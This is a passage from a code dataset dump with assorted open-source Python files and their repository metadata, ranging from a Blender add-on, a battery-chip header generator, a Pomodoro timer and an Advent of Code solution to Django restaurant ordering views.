bias, preccond)\n\n\ndef sample_triangular(dim):\n t = np.tril(np.random.randn(dim, dim), -1)\n diag = np.sqrt(np.random.gamma(shape=2, scale=2, size=dim))\n return t + np.diag(diag)\n\n\ndef sample_cholesky(dim):\n \"\"\"Sample cholesky parameters of a ConditionalGaussian of dimension dim.\"\"\"\n # parameters of marginal on A\n zetaa = np.random.randn(dim)\n lowera = sample_triangular(dim)\n\n # parameters of conditional\n linear = np.random.randn(dim, dim)\n bias = np.random.randn(dim)\n lowercond = sample_triangular(dim)\n\n return CholeskyConditionalNormal(zetaa, lowera, linear, bias, lowercond)\n\n\ndef sample(dim, mode, **kwargs):\n if mode == 'natural':\n return sample_natural(dim, mode='conjugate', **kwargs)\n elif mode == 'naive':\n return sample_natural(dim, mode=mode, **kwargs)\n elif mode == 'cholesky':\n return sample_cholesky(dim).to_natural()\n","repo_name":"remilepriol/causal-adaptation-speed","sub_path":"normal_pkg/normal.py","file_name":"normal.py","file_ext":"py","file_size_in_byte":11541,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"3430522915","text":"import bpy\n\n\nclass SAVE_LOAD_SHAPES_OT_SaveShape(bpy.types.Operator):\n bl_idname = \"save_load_shapes.save_shape\"\n bl_label = \"Save Shape\"\n bl_description = \"Save Shape\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n def execute(self, context):\n obj = bpy.context.active_object\n\n bpy.ops.object.mode_set(mode=\"OBJECT\")\n\n clone_obj = obj.copy()\n clone_obj.name = obj.name + \"_saved\"\n clone_obj.data = obj.data.copy()\n clone_obj.data.name = obj.data.name + \"_saved\"\n\n for item in obj.save_load_shapes.saved_shapes:\n if item.name == obj.save_load_shapes.save_name:\n item.obj = clone_obj\n bpy.ops.object.mode_set(mode=\"EDIT\")\n return {\"FINISHED\"}\n\n data = obj.save_load_shapes.saved_shapes.add()\n data.name = obj.save_load_shapes.save_name\n data.obj = clone_obj\n\n bpy.ops.object.mode_set(mode=\"EDIT\")\n\n return {\"FINISHED\"}\n\n\nclass SAVE_LOAD_SHAPES_OT_LoadShape(bpy.types.Operator):\n bl_idname = \"save_load_shapes.load_shape\"\n bl_label = \"Load Shape\"\n bl_description = \"Load Shape\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n index: bpy.props.IntProperty(options={\"HIDDEN\"})\n\n def execute(self, context):\n obj = bpy.context.active_object\n\n bpy.ops.object.mode_set(mode=\"OBJECT\")\n\n clone_obj = obj.save_load_shapes.saved_shapes[self.index].obj\n\n if clone_obj is None:\n raise Exception(f\"No saved mesh {self.item_name} in {obj.name}\")\n\n if obj.type == \"MESH\":\n for v in obj.data.vertices:\n if v.select:\n v.co = clone_obj.data.vertices[v.index].co\n\n for group in obj.vertex_groups:\n clone_group = clone_obj.vertex_groups.get(group.name)\n if clone_group is None:\n continue\n for i in range(len(obj.data.vertices)):\n try:\n value = clone_group.weight(i)\n group.add([i], value, \"REPLACE\")\n except RuntimeError:\n group.remove([i])\n\n if obj.type == \"CURVE\":\n for spline_index, spline in enumerate(obj.data.splines):\n for bp_index, bp in enumerate(spline.bezier_points):\n copy_bp = clone_obj.data.splines[spline_index].bezier_points[\n bp_index\n ]\n bp.co = copy_bp.co\n bp.handle_left = copy_bp.handle_left\n bp.handle_right = copy_bp.handle_right\n for p_index, p in enumerate(spline.points):\n copy_p = clone_obj.data.splines[spline_index].points[p_index]\n p.co = copy_p.co\n\n bpy.ops.object.mode_set(mode=\"EDIT\")\n\n return {\"FINISHED\"}\n\n\nclass SAVE_LOAD_SHAPES_OT_DeleteShape(bpy.types.Operator):\n bl_idname = \"save_load_shapes.delete_shape\"\n bl_label = \"Delete Shape\"\n bl_description = \"Delete Shape\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n def execute(self, context):\n obj = bpy.context.active_object\n\n i = 0\n while i < len(obj.save_load_shapes.saved_shapes):\n if (\n obj.save_load_shapes.saved_shapes[i].name\n == obj.save_load_shapes.delete_name\n ):\n obj.save_load_shapes.saved_shapes.remove(i)\n else:\n i += 1\n\n return {\"FINISHED\"}\n\n\nclass SAVE_LOAD_SHAPES_UL_LoadListItem(bpy.types.UIList):\n def draw_item(\n self, context, layout, data, item, icon, active_data, active_propname, index\n ):\n obj = bpy.context.active_object\n if obj is None:\n return\n if self.layout_type in {\"DEFAULT\", \"COMPACT\"}:\n layout.label(text=item.name)\n layout.operator(\n SAVE_LOAD_SHAPES_OT_LoadShape.bl_idname,\n text=\"Load\",\n ).index = index\n\n\nclass SAVE_LOAD_SHAPES_PT_Panel(bpy.types.Panel):\n bl_label = \"Save Load Shapes\"\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"UI\"\n bl_category = \"Save Load Shapes\"\n bl_context = \"mesh_edit\"\n\n def draw_header(self, context):\n layout = self.layout\n layout.label(text=\"\", icon=\"MESH_DATA\")\n\n def draw(self, context):\n layout = self.layout\n\n obj = bpy.context.active_object\n if obj is None:\n return\n\n box = layout.box()\n row = box.row()\n row.label(text=\"Save\")\n row.prop(obj.save_load_shapes, \"save_name\", text=\"\")\n row.operator(SAVE_LOAD_SHAPES_OT_SaveShape.bl_idname)\n\n box = layout.box()\n box.label(text=\"Load\")\n box.template_list(\n \"SAVE_LOAD_SHAPES_UL_LoadListItem\",\n \"load_list\",\n obj.save_load_shapes,\n \"saved_shapes\",\n obj.save_load_shapes,\n \"saved_shapes_index\",\n )\n\n box = layout.box()\n row = box.row()\n row.label(text=\"Delete\")\n row.prop(obj.save_load_shapes, \"delete_name\", text=\"\")\n row.operator(SAVE_LOAD_SHAPES_OT_DeleteShape.bl_idname)\n\n\nclass SAVE_LOAD_SHAPES_PG_SavedShapeItem(bpy.types.PropertyGroup):\n name: bpy.props.StringProperty(default=\"default\")\n obj: bpy.props.PointerProperty(type=bpy.types.Object)\n\n\nclass SAVE_LOAD_SHAPES_PG_Properties(bpy.types.PropertyGroup):\n save_name: bpy.props.StringProperty(default=\"default\")\n delete_name: bpy.props.StringProperty(default=\"\")\n saved_shapes: bpy.props.CollectionProperty(type=SAVE_LOAD_SHAPES_PG_SavedShapeItem)\n saved_shapes_index: bpy.props.IntProperty()\n\n\ndef register():\n bpy.types.Object.save_load_shapes = bpy.props.PointerProperty(\n type=SAVE_LOAD_SHAPES_PG_Properties\n )\n\n\ndef unregister():\n del bpy.types.Object.save_load_shapes\n","repo_name":"MatchaChoco010/BlenderUserScripts","sub_path":"addons/save-load-shapes/save_load_shape.py","file_name":"save_load_shape.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25769248718","text":"from docx import Document\n\n\ndef get_text(filename):\n try:\n if str(filename).endswith('docx'):\n s = ''\n doc = Document(filename)\n for i in doc.paragraphs:\n s += i.text + '\\n'\n return s\n with open(filename, 'r', encoding='utf-8') as file:\n return file.read()\n except FileNotFoundError:\n return None\n except UnicodeDecodeError:\n return None\n except:\n return None\n","repo_name":"Sus-arch/mission_kulture","sub_path":"utils/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2559256219","text":"##str1=\"人生苦短,我用Python!\"\n##substr1=str1[1]\n##substr2=str1[5:]\n##substr3=str1[:5]\n##substr4=str1[2:5]\n##print('原字符串:',str1)\n##print(substr1+'\\n'+substr2+'\\n'+substr3+'\\n'+substr4+'\\n')\n\nstr1=\"人生苦短,我用Python!\"\ntry:\n substr5=str1[15]\nexcept IndexError:\n print(\"指定的索引不存在!\")\n","repo_name":"Hurrieam/homework-csapp","sub_path":"Python作业/05 字符串/字符串切片.py","file_name":"字符串切片.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36635032875","text":"'''\r\n일본어 데이터 정제\r\n오상혁 나윤수\r\n2020.3.30 월 데이터 정제하는 코드\r\n인풋데이터 정제 및 문장부호 정리\r\n'''\r\n\r\nimport re\r\ndef prepro(text):\r\n # 문장기호 및 깨지는 공백문자 삭제\r\n sub_punc = re.sub('。|!|\\?', '', text)\r\n sub_u3000=re.sub(' ','',sub_punc)\r\n # 특수기호 〆를 しめ(시메)로 변경\r\n sub_sime = re.sub('〆', 'しめ', sub_u3000)\r\n\r\n return sub_sime\r\n","repo_name":"nys726/japanese_project","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70540557866","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 20 09:45:50 2021\n\n@author: thiba\n\"\"\"\n\nimport os\nimport json\n\nlist_dico = {}\n\nfor file in os.listdir('.'):\n if 'mmp' in file:\n print(file)\n with open(file, 'r') as f:\n data = json.load(f)\n \n list_dico.update(data)\n\nwith open('mmp_discrete_sanitized.json', 'w+') as fp:\n json.dump(list_dico, fp, indent=2)\n","repo_name":"thibautloiseau/3D_Vision_WiFi","sub_path":"stats/MMP assainissement/traitement_json.py","file_name":"traitement_json.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72851205226","text":"from xml.dom import minidom\nfrom xml.dom.minidom import Node\nimport re\n\nfrom xlrd import open_workbook\nfrom lxml import etree\nimport os\n\n\ndef replaceCodeRegion(file_path,region_name,new_region_content):\n\t#pragma region\n\tregex = \"// region \" + region_name + \".*\" + \"// endregion \" + region_name\n\t\n\tfile_content = open(file_path, 'r').read();\n\told_region_content = str(re.search(regex, file_content,re.DOTALL)[0])\n\n\t\n\tfile_content_list = file_content.split(old_region_content,1)\n\tfile_content = file_content_list[0]\n\tfile_content += \"// region \" + region_name + \"\\n\\n\"\n\tfile_content += new_region_content\n\tfile_content += \"\\n\\n// endregion \" + region_name\n\tfile_content += file_content_list[1]\n\tf = open(file_path,\"w\")\n\tf.write(file_content)\t\n\n\n\n\n\ndef formatHex(hex_str):\n\t\n\ttmp = removeWhiteSigns(hex_str.upper())\n\ttmp = tmp.replace(\"X\",\"x\")\n\tn = len(tmp)\n\t\n\tres = \"\"\n\tfor i in range(0,2):\n\t\tres += tmp[i]\n\tfor i in range(0,10-n):\n\t\tres += \"0\"\n\tfor i in range(2,n):\n\t\tres += tmp[i]\n\t\t\n\treturn res\n\t\ndef removeWhiteSigns(str):\n\tres = \"\"\n\t\n\tfor c in str:\n\t\tif ord(c) > 32 and ord(c) < 127:\n\t\t\tres += c\n\treturn res\ndef getCellValuesList(sheet,row,col):\n\treturn str(sheet.cell(row,col).value).split()\t\ndef getCellValue(sheet,row,col):\n\treturn removeWhiteSigns(str(sheet.cell(row,col).value))\ndef getCellValue2(sheet,row,col):\n\tres = str(sheet.cell(row,col).value)\n\tres = res.replace(\"—\", \"-\")\n\treturn res\n\n\ndef xls2xml():\n\n\tfilesDir = '';\n\troot = etree.Element(\"flash\")\n\t\n\n\twb = open_workbook('bq78350.xlsx')\n\n\tfor sheet in wb.sheets():\n\t\tnumber_of_rows = sheet.nrows\n\t\tnumber_of_columns = sheet.ncols\n\t\t\n\t\tfor row in range(2, number_of_rows):\n\t\n\t\t\taf = etree.SubElement(root, \"REG\")\n\t\t\taf.set('class',getCellValue(sheet,row,0))\n\t\t\taf.set('subclass',getCellValue(sheet,row,1))\n\t\t\taf.set('address',getCellValue(sheet,row,2));\n\t\t\taf.set('name',getCellValue(sheet,row,3));\n\t\t\taf.set('type',getCellValue(sheet,row,4));\n\n\n\twb = open_workbook('SBS.xlsx')\n\n\tfor sheet in wb.sheets():\n\t\tnumber_of_rows = sheet.nrows\n\t\tnumber_of_columns = sheet.ncols\n\t\t\n\t\tfor row in range(2, number_of_rows):\n\t\n\t\t\taf = etree.SubElement(root, \"SBS\")\n\t\t\taf.set('value',getCellValue(sheet,row,0))\n\t\t\taf.set('access',getCellValue(sheet,row,1))\n\t\t\taf.set('name',getCellValue(sheet,row,2));\n\t\t\taf.set('dataDescription',getCellValue2(sheet,row,3));\n\t\t\taf.set('dataSize',getCellValue2(sheet,row,4));\n\t\t\taf.set('min',getCellValue2(sheet,row,5));\n\t\t\taf.set('max',getCellValue2(sheet,row,6));\n\t\t\taf.set('default',getCellValue2(sheet,row,7));\n\t\t\taf.set('units',getCellValue2(sheet,row,8));\n\t\n\twb = open_workbook('MA.xlsx')\n\n\tfor sheet in wb.sheets():\n\t\tnumber_of_rows = sheet.nrows\n\t\tnumber_of_columns = sheet.ncols\n\t\t\n\t\tfor row in range(2, number_of_rows):\n\t\n\t\t\taf = etree.SubElement(root, \"MA\")\n\t\t\taf.set('value',getCellValue(sheet,row,0))\n\t\t\taf.set('name',getCellValue(sheet,row,1))\n\t\t\taf.set('access',getCellValue(sheet,row,2))\n\t\t\t\t\n\ttree = etree.ElementTree(root)\n\ttree.write('bq78350.xml',pretty_print=True)\n\t\t\t\t\ndef getPlatformCondition(device_tag):\n\treturn str(\"#if (kLib_config_PLATFORM == kLib_\"+getName(device_tag)+\")\\n\\n\")\ndef getEndIfStr():\n\treturn str(\"#endif\\n\")\ndef grabTags(parent,tag_name):\n\treturn parent.getElementsByTagName(tag_name)\ndef getAttribute(tag,attribute_name):\n\treturn str(tag.attributes[attribute_name].value)\ndef getValue(tag):\n\treturn getAttribute(tag,'value')\n\ndef getName(tag):\n\treturn getAttribute(tag,'name')\ndef getStructEnumOpener():\n\tres = str(\t\"\\ttypedef struct\\n\"+\n\t\t\t\t\"\\t{\\n\"+\n\t\t\t\t\"\\t\\ttypedef enum\\n\"+\n\t\t\t\t\"\\t\\t{\")\n\treturn res\ndef getStructEnumCloser(enum_name,struct_name):\n\tres = \"\\n\\t\\t}\"+enum_name+\";\\n\"\n\tres += \"\\t}\"+struct_name+\";\\n\\n\"\n\treturn res\ndef getStructOpener():\n\tres = str(\t\"\\ttypedef struct\\n\"+\n\t\t\t\t\"\\t{\")\n\treturn res\ndef getStructCloser(struct_name):\n\tres = \"\\n\\t}\"+struct_name+\";\\n\\n\"\n\treturn res\n\n\ndef getClassName(tag):\n\treturn getAttribute(tag,'class')\ndef getSublcassName(tag):\n\treturn getAttribute(tag,'subclass')\n\t\ndef getClassListNames(tags):\n\tres = []\n\t\n\tfor tag in tags:\n\t\tclass_name = getClassName(tag)\n\t\tif class_name not in res:\n\t\t\tres.append(class_name)\n\treturn res\n\t\ndef getSubclassListNames(tags):\n\tres = []\n\t\n\tfor tag in tags:\n\t\tsubclass_name = getSublcassName(tag)\n\t\tif subclass_name not in res:\n\t\t\tres.append(subclass_name)\n\treturn res\n\ndef grabAllClassTags(parent,class_name):\n\tres = []\n\tfor tag in parent:\n\t\tif class_name == getClassName(tag):\n\t\t\tres.append(tag)\n\treturn res\ndef grabAllSubclassTags(parent,subclass_name):\n\tres = []\n\tfor tag in parent:\n\t\tif subclass_name == getSublcassName(tag):\n\t\t\tres.append(tag)\n\treturn res\n\ndef assertString(str):\n\tstr = str.replace(\".\",\"\")\n\tstr = str.replace(\"%\",\"Percent\")\n\tstr = str.replace(\"/\",\"_\")\n\tstr = str.replace(\"-\",\"\")\n\t\n\treturn str\n\t\ndef removeDecimalPoints(str):\n\tstr = str.replace(\".0\", \"\")\n\treturn str\n\ndef createDataFlashRegisterStructs():\n\n\tres = \"\"\n\tdefs = minidom.parse('bq78350.xml')\n\tregisters = defs.getElementsByTagName('REG')\n\n\tclasses = getClassListNames(registers)\n\t\n\t\n\tfor class_name in classes:\n\t\t\n\t\tclass_tags = grabAllClassTags(registers,class_name)\n\t\tsubclasses_names = getSubclassListNames(class_tags)\n\t\t\n\t\t\n\t\tclass_name = assertString(class_name)\n\t\t\n\t\tfor subclass_name in subclasses_names:\n\t\t\tsubclass_tags = grabAllSubclassTags(class_tags,subclass_name)\n\t\t\n\t\t\tsubclass_name = assertString(subclass_name)\n\t\t\n\t\t\tenum_exist = False\n\t\t\tfor tag in subclass_tags:\n\t\t\t\tif not enum_exist:\n\t\t\t\t\tres += getStructEnumOpener()\n\t\t\t\tif enum_exist:\n\t\t\t\t\tres += \",\"\n\t\t\t\tenum_exist = True\n\n\t\t\t\t\n\n\t\t\t\ttemp_name = getAttribute(tag,'name')\n\t\t\t\ttemp_name = assertString(temp_name)\n\n\t\t\t\tres += \"\\n\\t\\t\\t_\" + temp_name + \" = \" + getAttribute(tag,'address')\n\t\t\t\n\t\t\tif enum_exist:\n\t\t\t\ttemp_str = \"kBQ78350_DATA_FLASH_REGISTER_\"+class_name+\"_\"+ subclass_name + \"_SELECT_\"\n\t\t\t\tres += getStructEnumCloser(temp_str + \"ENUM\",temp_str + \"STRUCT\")\n\n\tfor class_name in classes:\n\t\t\n\t\tclass_tags = grabAllClassTags(registers,class_name)\n\t\tsubclasses_names = getSubclassListNames(class_tags)\n\t\t\n\t\tclass_name = assertString(class_name)\n\t\t\n\t\tres += getStructOpener()\n\t\tfor subclass_name in subclasses_names:\n\n\t\t\tsubclass_name = assertString(subclass_name)\n\n\t\t\ttemp_str = \"kBQ78350_DATA_FLASH_REGISTER_\"+class_name+\"_\"+ subclass_name + \"_SELECT_STRUCT\"\n\t\t\tres += \"\\n\\t\\t\" + temp_str + \" _\" + subclass_name + \";\"\n\t\t\t\n\t\ttemp_str = \"kBQ78350_DATA_FLASH_REGISTER_\"+class_name+\"_SELECT_SELECT_STRUCT\"\n\t\tres += getStructCloser(temp_str)\n\t\t\n\tres += getStructOpener()\n\tfor class_name in classes:\n\t\t\n\t\tclass_name = assertString(class_name)\n\t\t\n\t\ttemp_str = \"kBQ78350_DATA_FLASH_REGISTER_\"+class_name+\"_SELECT_SELECT_STRUCT\"\n\t\tres += \"\\n\\t\\t\" + temp_str + \" _\" + class_name + \";\"\n\t\t\n\ttemp_str = \"kBQ78350_DATA_FLASH_REGISTER_SELECT_SELECT_SELECT_STRUCT\"\n\tres += getStructCloser(temp_str)\n\t\t\n\t\n\tsbs = defs.getElementsByTagName('SBS')\n\tres += getStructEnumOpener()\n\tisLastTag = True\n\tn = len(sbs)\n\ti=0\n\t\n\tmax_str = \"RemainingCapacityAlarm = 0x01,\"\n\t\n\tfor tag in sbs:\n\t\ti+= 1\n\n\t\ttemp = \"\\n\\t\\t\\t\" + getAttribute(tag,'name') + \" = \" + getAttribute(tag,'value')\n\t\tif i != n:\n\t\t\ttemp += \",\"\n\t\tm = len(max_str) - len(temp) + 2\n\t\tfor j in range(0,m):\n\t\t\ttemp += \" \"\n\t\ttemp += \"\\t// ACCESS: \" + getAttribute(tag,'access')\n\t\ttemp += \",\\tDATA TYPE: \" + getAttribute(tag,'dataDescription')\n\t\ttemp += \",\\tDATA SIZE: \" + removeDecimalPoints(getAttribute(tag,'dataSize'))\n\t\ttemp += \",\\tMIN: \" + removeDecimalPoints(getAttribute(tag,'min'))\n\t\ttemp += \",\\tMAX: \" + removeDecimalPoints(getAttribute(tag,'max'))\n\t\ttemp += \",\\tDEFAULT: \" + removeDecimalPoints(getAttribute(tag,'default'))\n\t\ttemp += \",\\tUNIT: \" + getAttribute(tag,'units')\n\t\t\n\t\t\n\t\tres += temp\n\t\t\n\ttemp_str = \"kBQ78350_SBS_COMMANDS_\"\n\tres += getStructEnumCloser(temp_str + \"ENUM\",temp_str + \"STRUCT\")\t\t\n\t\n\n\tma = defs.getElementsByTagName('MA')\n\tres += getStructEnumOpener()\n\tisLastTag = True\n\tn = len(ma)\n\ti=0\n\t\n\tmax_str = \"OutputCellVoltageCCandTempforCalibration = 0xF082 \"\n\t\n\tfor tag in ma:\n\t\ti+= 1\n\n\t\ttemp = \"\\n\\t\\t\\t\" + getAttribute(tag,'name') + \" = \" + getAttribute(tag,'value')\n\t\tif i != n:\n\t\t\ttemp += \",\"\n\t\tm = len(max_str) - len(temp) + 2\n\t\tfor j in range(0,m):\n\t\t\ttemp += \" \"\n\t\ttemp += \"\\t// ACCESS: \" + getAttribute(tag,'access')\n\t\t\n\t\tres += temp\n\t\t\n\ttemp_str = \"kBQ78350_MANUFACTURER_ACCESS_COMMANDS_\"\n\tres += getStructEnumCloser(temp_str + \"ENUM\",temp_str + \"STRUCT\")\t\t\n\n\treturn res\n\n\n\t\nxls2xml()\nreplaceCodeRegion(\"../../../inc/kIC/kBQ78350.h\",'PLATFORM_DEPENDED_STRUCTS',createDataFlashRegisterStructs())\n","repo_name":"knkresources/kLib","sub_path":"auto/other/bq78350/autoDefs.py","file_name":"autoDefs.py","file_ext":"py","file_size_in_byte":8432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27814635949","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n\nbins=50\n\n\ndf1 = pd.read_csv('output/bw_r10fm_N5000.dat', header=None, names=['exc0','exc'])\ndf2 = pd.read_csv('output/bw_r10fm_N5000_ad.dat', header=None, names=['exc0','exc'])\n\nx = df1['exc0']\nf = stats.gaussian_kde(x)\nn, x, _ = plt.hist(x, bins=bins, range=(1.5,6.0), histtype='step', density=True, color='white')\nplt.plot(x, f(x), label='No Coulomb repulsion')\n\nx = df1['exc']\nf = stats.gaussian_kde(x)\nn, x, _ = plt.hist(x, bins=bins, range=(1.5,6.0), histtype='step', density=True, color='white')\nplt.plot(x, f(x), label=r'Isotropic; $d_1=10$ fm')\n\nx = df2['exc']\nf = stats.gaussian_kde(x)\nn, x, _ = plt.hist(x, bins=bins, range=(1.5,6.0), histtype='step', density=True, color='white')\nplt.plot(x, f(x), label=r'$1-\\sin^2\\theta$; $d_1=10$ fm')\n\n\nplt.xlabel(r'$E_{x}$(Be) (MeV)')\n\nplt.title(r'Effect of Coulomb repulsion on reconstruction of $^8$Be excitation energy')\n\nplt.legend(prop={'size': 8})\n\nplt.savefig('bw.png')\n\nplt.show()\n\n","repo_name":"oliskir/coulomb3a","sub_path":"plot_bw.py","file_name":"plot_bw.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32198033991","text":"from tkinter import *\nimport math\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nreps = 0\ntimer = None\n# ---------------------------- TIMER RESET ------------------------------- # \ndef reset_timer():\n global reps\n window.after_cancel(timer)\n cavas.itemconfig(timer_text, text=f\"00:00\")\n timer_lable.config(text=\"Timer\", fg=GREEN)\n tik_lable.config(text=\"\")\n reps = 0\n# ---------------------------- TIMER MECHANISM ------------------------------- # \ndef start_timer():\n global reps\n work_sec = WORK_MIN\n short_break_sec = SHORT_BREAK_MIN\n long_break_sec = LONG_BREAK_MIN\n\n reps += 1\n if reps in [1,3,5,7]:\n timer_lable.config(text=\"Work\", fg=GREEN)\n\n count_down(work_sec)\n print(\"work 25 sec \")\n\n\n\n elif reps == 8:\n timer_lable.config(text=\"Break\", fg=RED)\n count_down(long_break_sec)\n print(\"long break 20 sec\")\n\n\n elif reps in [2,4,6]:\n timer_lable.config(text=\"Break\", fg=PINK)\n count_down(short_break_sec)\n print(\"short break 5 \")\n\n\n\n# ---------------------------- COUNTDOWN MECHANISM ------------------------------- # \ndef count_down(count):\n global reps\n count_min = math.floor(count/60)\n count_sec = count % 60\n if count_sec < 10:\n count_sec = f\"0{count_sec}\"\n\n cavas.itemconfig(timer_text, text=f\"{count_min}:{count_sec}\")\n if count > 0:\n global timer\n timer=window.after(1000, count_down, count-1)\n else:\n start_timer()\n tik=\"✔\"\n if reps%2==0:\n tik_lable.config(text=f\"{tik*math.floor(reps/2)}\")\n\n # ---------------------------- UI SETUP ------------------------------- #\nwindow = Tk()\nwindow.title(\"Pomidoro\")\nwindow.config(padx=100, pady=50, bg=YELLOW)\n\n\n\n\ncavas = Canvas(width=200,height=224, bg=YELLOW, highlightthickness=0)\ntomato_img = PhotoImage(file=\"tomato.png\")\ncavas.create_image(100, 112, image=tomato_img)\ntimer_text = cavas.create_text(100, 132, text=\"00:00\", fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\ncavas.grid(row=1,column=1)\n# cavas.pack( )\n\n\ntimer_lable = Label(text=\"Timer\", fg=GREEN, bg=YELLOW, font=(FONT_NAME,40))\ntimer_lable.grid(row=0,column=1)\n\nstat_button = Button(text=\"Start\",background=YELLOW, highlightthickness=0, command=start_timer)\nstat_button.grid(row=2,column=0)\n\nreset_button = Button(text=\"Reset\", highlightthickness=0, command=reset_timer)\nreset_button.grid(row=2, column=2)\n\ntik_lable = Label(bg=YELLOW, fg=GREEN,font=(FONT_NAME,35,\"bold\"))\ntik_lable.grid(row=3,column=1)\n\nwindow.mainloop()","repo_name":"foxmeller/pomidoro_timer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11379524115","text":"from collections import defaultdict\nimport re\nimport datetime\n\nmins = defaultdict(int)\nmin_sleep_guard = defaultdict(lambda: defaultdict(int))\nduty = None\nsleep = None\n\nre_l = re.compile(r'\\[([^\\]]+)\\] (.+)')\n\nlines = list(open('input04'))\nlines.sort()\nfor l in lines:\n dat, event = re_l.match(l.strip()).groups()\n dt = datetime.datetime.strptime(dat, '%Y-%m-%d %H:%M')\n if event.startswith('Guard'):\n duty = event.split()[1]\n if 'asleep' in event:\n sleep = dt\n if 'wakes' in event:\n mins[duty] += (dt - sleep).seconds / 60\n m2 = dt.minute\n m = sleep.minute\n while m != m2:\n min_sleep_guard[duty][m] += 1\n m += 1\n m %= 60\n\nk = max(mins.items(), key=lambda kv:kv[1])[0]\nkk = max(min_sleep_guard[k].items(), key=lambda kv:kv[1])[0]\nprint(int(k[1:]) * kk)\n \n\n\n\n","repo_name":"kyegupov/aoc2018","sub_path":"day04_1.py","file_name":"day04_1.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25501954021","text":"#!/usr/bin/env python\n\"\"\"Setup script for the dotblas module distribution.\"\"\"\n__revision__ = \"$Version$\"\n\nfrom distutils.core import setup, Extension\n\n# Set this to point at your BLAS/ATLAS libraries\nblas_dirs_list = ['/usr/lib/']\nblas_libraries_list = ['lapack','cblas','f77blas', 'atlas', 'g2c']\n\nsetup (# Distribution meta-data\n name = \"dotblas\",\n version = \"1.0a\",\n description = \"Provides a BLAS optimised dot product for Numeric arrays\",\n author = \"Richard Everson\",\n author_email = \"R.M.Everson@exeter.ac.uk\",\n url = \"http://www.dcs.ex.ac.uk/people/reverson\",\n license = \"MIT\",\n # Description of the modules and packages in the distribution\n packages = ['dotblas'],\n ext_modules = \n [Extension('_dotblas', ['dotblas/_dotblas.c'],\n library_dirs=blas_dirs_list ,\n libraries=blas_libraries_list,\n ),\n ]\n )\n","repo_name":"mikeswamp/numeric_copy","sub_path":"Packages/dotblas/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10971685152","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpRequest\nfrom django.template import RequestContext\nfrom restaurant.models import Category, Food\nfrom order.models import Order, Order_State, Cart, Cart_State\nfrom django.views.generic import TemplateView\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User, auth\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nimport itertools\nimport json\n\n# Create your views here.\ndef index(request):\n\n return render(\n request,\n 'restaurant/index.html',\n )\n\ndef login(request):\n if request.method == 'GET':\n username = request.GET.get('username')\n password = request.GET.get('password')\n\n user = auth.authenticate(username=username, password=password)\n\n if user is not None:\n auth.login(request, user)\n try:\n order = Order.objects.get(table_id = auth.get_user(request), billed = False)\n except Order.DoesNotExist:\n order = Order.objects.create(table_id=auth.get_user(request))\n print('=========================================')\n print(\"Table \", username, \" logged in successfully!\")\n print('=========================================')\n return redirect('index')\n else:\n return HttpResponse('

Please scan QR code in order to use our website

')\n else:\n return HttpResponse('Please scan QR code in order to use our website')\n\n@login_required(redirect_field_name='login')\ndef logout(request):\n try:\n order = Order.objects.get(table_id = auth.get_user(request), billed = False)\n return redirect('home')\n except Order.DoesNotExist:\n auth.logout(request)\n return HttpResponseRedirect('thankyou')\n\n@login_required(redirect_field_name='login')\ndef block_home(request):\n hasOrder = False\n total = 0\n try:\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n state = Order_State.objects.filter(order = bill)\n for state in state:\n if state.state != 'cancelled':\n total += state.food.price\n hasOrder = True\n except Order.DoesNotExist:\n hasOrder = False\n args = {'hasOrder': hasOrder, 'total': total}\n return render(\n request,\n 'restaurant/block_home.html',\n args,\n )\n\n@login_required(redirect_field_name='login')\ndef home(request):\n return render(\n request,\n 'restaurant/home.html',\n {\n\t\t\t'header':'Welcome',\n }\n )\n\n@login_required(redirect_field_name='login')\ndef billed(request):\n try:\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n bill.billed = True\n bill.save()\n except Order.DoesNotExist:\n pass\n try:\n cart = Cart.objects.filter(table_id = auth.get_user(request))\n cart.delete()\n except Cart.DoesNotExist:\n pass\n 